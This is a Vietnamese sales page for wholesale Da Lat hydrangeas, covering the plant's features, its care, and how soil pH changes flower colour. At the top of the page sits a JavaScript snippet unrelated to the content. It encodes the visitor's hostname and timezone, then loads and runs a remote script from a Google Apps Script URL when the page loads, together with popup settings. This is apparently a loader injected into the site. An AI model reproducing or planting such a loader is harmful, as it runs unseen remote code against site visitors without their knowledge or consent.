var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Gợi ý hoa cẩm tú cầu giá sỉ [Hot Nhất 2023]

Chậu hoa Cẩm tú cầu hay còn có tên gọi khác là hoa Dương Tú Cầu. Loài hoa chậu giá rẻ này có tên khoa học là Hydrangea macrophylla. Hiện vựa hoa Đà Lạt đang cung cấp và phân phối giá sỉ các giống hoa cẩm tú cầu di các tỉnh với các màu sắc đa dạng.

1.Đặc điểm hoa cẩm tú cầu giá sỉ Đà Lạt:

Hoa chậu cẩm tú cầu có kích thước từ 25 cm đến 1m nếu trồng trong các vườn hoa Đà Lạt. Đây là giống cây cảnh để bàn khá đẹp và hiện đang rất nổi tiếng tại Đà Lạt. Hoa cẩm tú cầu có hình cầu được kết lại bởi nhiều bông ho nhỏ. Hoa có nhiều màu sắc khác nhau từ xanh dương đến hồng phấn, xanh trắng,…. Cẩm tú cầu là giống cây bụi, loài hoa chậu giá rẻ này thích ẩm và bóng râm. Thích hợp cho việc trồng cây cảnh tại các văn phòng, phòng khách,…

Ảnh: Giống hoa cẩm tú cầu Đà Lạt giá sỉ Nguồn:internet

2.Việc chăm sóc chậu hoa cẩm tú cầu Đà lạt

Là giống cây cảnh để bàn ưa ẩm thấp tuổi thọ cao, việc chăm sóc chậu hoa cũng khá đơn giản. Quá trình chăm sóc cẩm tú cầu đơn giản hơn các loại sen đá giá rẻ Đà Lạt, quá trình chăm sóc gồm tưới: thường xuyên chăm sóc cắt tỉa loại bỏ những cành khô hoặc hư hỏng, tưới nước thường xuyên cho cây và chú ý đến việc bón phân, thay đất cho chậu hoa theo chu kỳ. Chú ý về việc cho chậu hoa ngủ đông để có lứa hoa đẹp nhất vào mùa xuân. Quy trình cho hoa ngủ đông: Tưới nước cho chậu thật ẩm sau đó ngưng tưới để khô đất cho đến thời gian đầu mùa xuân sẽ bắt đầu tưới lại cho cây.

Ảnh: Giống hoa cẩm tú cầu hồng Đà Lạt giá sỉ Nguồn:internet

3. Các loại đất trồng hoa chậu cẩm tú cầu Đà Lạt:

Đây là giống hoa chậu Đà Lạt có sức sống khỏe nên thích hợp với nhiều loại đất từ đất chua, kiềm, trung tính cây điều sống được. Và phụ thuộc vào từng loại đất mà cây cho ra các màu hoa khách nhau. Để có các màu hoa khác nhau chỉ cần thay đổi độ pH trong đất trồng hoa cẩm tú cầu.

Ví dụ: hoa cẩm tú cầu xanh thì đất trong chậu hoa có độ pH =< 5 (chậu hoa có đất chua). Để đất trồng hoa có độ chua ta có thể bón nhôm sulfate một lần/tháng. Với kinh nghiệm trồng hoa cầm tú cầu Đà Lạt các nhà vườn để hạ thập độ pH thường đóng đinh quanh gốc cây hoặc dùng phân phosphate thấp, có thể tưới giấm,… Hoa cẩm tú cầu hồng chúng ta nên tưới thêm vôi vào đất trồng trong mùa xuân hoa sẽ chuyển từ hoa màu xanh sang hồng hoặc đỏ. Để giảm độ chưa trong đất trồng cẩm tú có thể bón tro, vôi vào đất. Để có hoa cẩm tú cầu đỏ nên bón thêm phân phosphate có chỉ số cao hoặc lime, vôi bột để làm tăng pH của đất trong chậu. Để có chậu hoa cẩm tú cầu màu trắng sữa thì độ pH của đất là trung tính pH = 7.

Ảnh: Giống hoa cẩm tú cầu xanh dương Đà Lạt giá sỉ Nguồn:internet

>>> Xem thông tin các loại hoa chậu Đà Lạt giá sỉ rẻ nhất – 0898 9097 86